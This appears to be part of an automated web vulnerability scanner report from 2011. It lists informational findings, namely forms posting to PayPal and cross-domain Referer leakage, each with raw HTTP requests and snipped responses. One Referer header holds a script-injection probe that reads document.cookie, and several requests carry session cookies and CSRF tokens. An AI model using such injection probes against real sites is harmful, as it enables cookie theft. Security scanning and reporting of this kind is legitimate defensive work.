Confidence:   Certain
Host:   http://www.vsea.org
Path:   /maine-study-finds-state%26%23039

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /maine-study-finds-state%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.18. http://www.vsea.org/node  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /node

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /node HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.19. http://www.vsea.org/purchase-vsea-clothing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /purchase-vsea-clothing

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /purchase-vsea-clothing HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-your-union
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pur
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.20. http://www.vsea.org/state-hospital%26%23039  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /state-hospital%26%23039

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /state-hospital%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:40 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.21. http://www.vsea.org/user/password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /user/password

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /user/password HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:59 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:14:00 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Use
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

18.22. http://www.vsea.org/user/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /user/register

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /user/register HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:58 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:58 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 34277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Use
...[SNIP]...
<div class="content">
<form method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p class="rtecenter">
...[SNIP]...

19. Cross-domain Referer leakage  previous  next
There are 56 instances of this issue:


19.1. http://cdn.livestream.com/embedfiles/embed-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.livestream.com
Path:   /embedfiles/embed-min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embedfiles/embed-min.js?v=4.0.736 HTTP/1.1
Host: cdn.livestream.com
Proxy-Connection: keep-alive
Referer: http://cdn.livestream.com/embed/nysenate?layout=4&color=0x000000&mute=false&autoPlay=false&iconColorOver=0xE7E7E7&iconColor=0xCCCCCC
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "f58d3223ab52ee86ed38a32dfa3a1d6e:1303995199"
Last-Modified: Thu, 28 Apr 2011 12:53:19 GMT
Accept-Ranges: bytes
Content-Length: 19700
Content-Type: application/x-javascript
Cache-Control: max-age=86400
Date: Fri, 29 Apr 2011 22:50:45 GMT
Connection: close

var channelname=null;var clipid="";var time="";var parameters="";var width,height,playerWidth,playerHeight,playerWidth,playerHeight,chatWidth,chatHeight,libraryWidth,libraryHeight,windowWidth,windowHe
...[SNIP]...
<h2><a href="http://www.adobe.com/go/getflashplayer">Get                Adobe Flash Player</a>
...[SNIP]...

19.2. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=triggit1&u=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.4971795796882361 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://a.triggit.com/pxgcm?id=CAESEJcTHYWgkCLwCpssYJWpM-Y&cver=1&u=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.4971795796882361
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 30 Apr 2011 15:08:25 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 334
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://a.triggit.com/pxgcm?id=CAESEJcTHYWgkCLwCpssYJWpM-Y&amp;cver=1&amp;u=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&amp;cb=0.4971795796882361">here</A>
...[SNIP]...

19.3. http://data.ok.gov/packages/shared-map.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /packages/shared-map.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /packages/shared-map.js?1304158436 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:50 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:04:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sat, 07 May 2011 11:22:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript
Content-Length: 74759

function MarkerClusterer(e,a,d){this.extend(MarkerClusterer,google.maps.OverlayView);this.map_=e;this.markers_=[];this.clusters_=[];this.sizes=[53,56,66,78,90];this.styles_=[];this.ready_=false;var b=
...[SNIP]...
</div>');m=f.$dom().siblings("#bing_infoWindow")}m.show().find("#bing_infoContent").empty().append(f.getFlyout(h.rows,h.flyoutDetails,h.dataView)).prepend('<img src="http://maps.gstatic.com/intl/en_us/mapfiles/iw_close.gif"/>');var e=j.x;var n=j.y;if(h instanceof Microsoft.Maps.Pushpin){n-=h.getHeight()}else{n-=17}if(!h.custom_icon){n-=7}if(e+m.width()>
...[SNIP]...

19.4. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libdatalinks.show

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pls/pbis/dyn_osbmweb_libdatalinks.show?p_arg_names=context&p_arg_values=facts HTTP/1.1
Host: data.osbm.state.nc.us
Proxy-Connection: keep-alive
Referer: http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:37 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 45766
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 45766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.fedstats.gov/>FedStats</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://gos2.geodata.gov/wps/portal/gos>Geographic Information</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ntis.gov/products/types/databases/online.asp?loc=4-4-3#environment>NTIS Databases</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nist.gov/srd/onlinelist.htm>Scientific and Technical Databases</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.whitehouse.gov/news/fsbr.html>White House - Federal Statistics</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.hhs.gov/aging/index.html#data>Aging</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.census.gov/>Census and Surveys</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.huduser.org/datasets/pdrdatas.html>HUD Data</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.dhs.gov/ximgtn/statistics/>Immigration</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.acf.hhs.gov/programs/orr/data/index.htm>Refugee Resettlement</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www1.va.gov/vetdata/>Veterans</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ocme.unc.edu/annreport/index.shtml>Medical Examiner Reports</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdhhs.gov/mhddsas/statspublications/index.htm>Mental Health</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nclabor.com/dol_statistics/stats.htm>Occupational Health/Safety</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdhhs.gov/dss/stats/index.htm>Social Servcies</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.acf.hhs.gov/programs/ccb/data/>Child Care and Development</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cdc.gov/DataStatistics/>Disease Control</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.niehs.nih.gov/research/resources/library/research/statistics/index.cfm>Environmental Health</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cdc.gov/nchs/fastats/>Fast Stats A-Z</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nichd.nih.gov/news/resources/healthstats/>Health - NCHS</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.hhs-stat.net/scripts/datafinder.cfm>Health and Human Service Data Finder</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://hcupnet.ahrq.gov/>Hospital Utilization</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cdc.gov/ncipc/osp/data.htm>Injuries</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cms.hhs.gov/home/rsds.asp>Medicare and Medicaid</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cdc.gov/nchstp/dstd/Stats_Trends/Stats_and_Trends.htm>Sexually-Transmitted Diseases</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.drugabusestatistics.samhsa.gov/index.htm#Products>Substance Abuse</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.acf.hhs.gov/programs/ofs/data/index.html>TANF Financial</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.cdc.gov/nchs/nvss.htm>Vital Statistics - NCHS</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncccs.cc.nc.us/Statistical_Reports/index.html>Community Colleges</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.northcarolina.edu/content.php/assessment/reports/abstract-current.htm>Higher Education</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncreportcards.org/src/>NC Report Card</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdnpe.org/>Non-Public Education</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ed.gov/rschstat/landing.jhtml?src=rt>Education</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://nces.ed.gov/>National Center for Education Statistics</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncsbi.gov/crimestatistics/crimestatistics.jsp>Crime</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccrimecontrol.org/Index2.cfm?a=000003,000011,000642>Criminal Justice</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccrimecontrol.org/index2.cfm?a=000003,000010,001623,000179,000480>Disaster Assistance</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccrimecontrol.org/Index2.cfm?a=000003,000014,000791>Highway Patrol</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccrimecontrol.org/index2.cfm?a=000003,000005,000081,000251>Missing Persons</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccrimecontrol.org/index2.cfm?a=000003,000006,000151>Police Calls</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncfindoffender.gov/stats.aspx>Sex Offenders</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.atf.treas.gov/stats.htm>Arson, Explosives, and Firearms</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ojp.gov/bjs/correct.htm>Corrections</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.fbi.gov/ucr/ucr.htm#cius>Crime</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ojp.usdoj.gov/bjs/pubalp2.htm#cfjs>Justice Statistical Publications</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.bop.gov/news/quick.jsp>Prison Data</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.uscourts.gov/library/statisticalreports.html>US Courts</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncfloodmaps.com/default_swf.asp>Floodplain Mapping</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.eia.doe.gov/>Energy</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.epa.gov/epahome/Data.html>Environment</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.fws.gov/fire/program_statistics/>Fire Management</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://ngmdb.usgs.gov/>Geogologic Maps</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nws.noaa.gov/om/hazstats.shtml>Natural Hazards</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nrcs.usda.gov/technical/maps.html>Natural Resources and Conservation</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncosc.net/financial/index.html>State Financial Reports</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncosc.net/financial/index.html>State Property Search</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.federalreserve.gov/releases/>Federal Reserve Board</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ustreas.gov/offices/domestic-finance/debt-management/interest-rate/>Interest Rate</a>
...[SNIP]...
